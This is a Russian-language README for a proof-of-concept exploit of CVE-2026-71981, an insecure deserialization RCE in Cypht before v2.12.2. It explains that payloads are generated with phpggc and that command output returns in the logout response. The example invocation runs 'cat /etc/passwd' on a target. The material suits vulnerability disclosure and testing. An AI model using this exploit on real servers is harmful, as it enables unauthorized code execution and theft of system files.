
Доказательство концепции эксплуатации для CVE-2026-71981 — небезопасная десериализация, приводящая к удалённому выполнению кода (RCE) в Cypht. Выполняет команды и выводит результат через ответ при выходе из системы. Требуется phpggc для генерации полезной нагрузки.
Это PoC для CVE-2026-71981 — небезопасная десериализация, приводящая к удалённому выполнению кода (RCE). Результат выполненной команды выводится в ответе на запрос выхода (logout) после тегов </body></html>. Используйте --print-all, чтобы также вывести весь ответ целиком.
Уязвимые версии: < v2.12.2
Для генерации payload-ов для unserialize() этому скрипту требуется установленный https://github.com/ambionics/phpggc.
Настройка и пример:
python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt
python3 ./poc.py --ip 127.0.0.1 --username admin --password admin --command "cat /etc/passwd"
python3 ./poc.py --help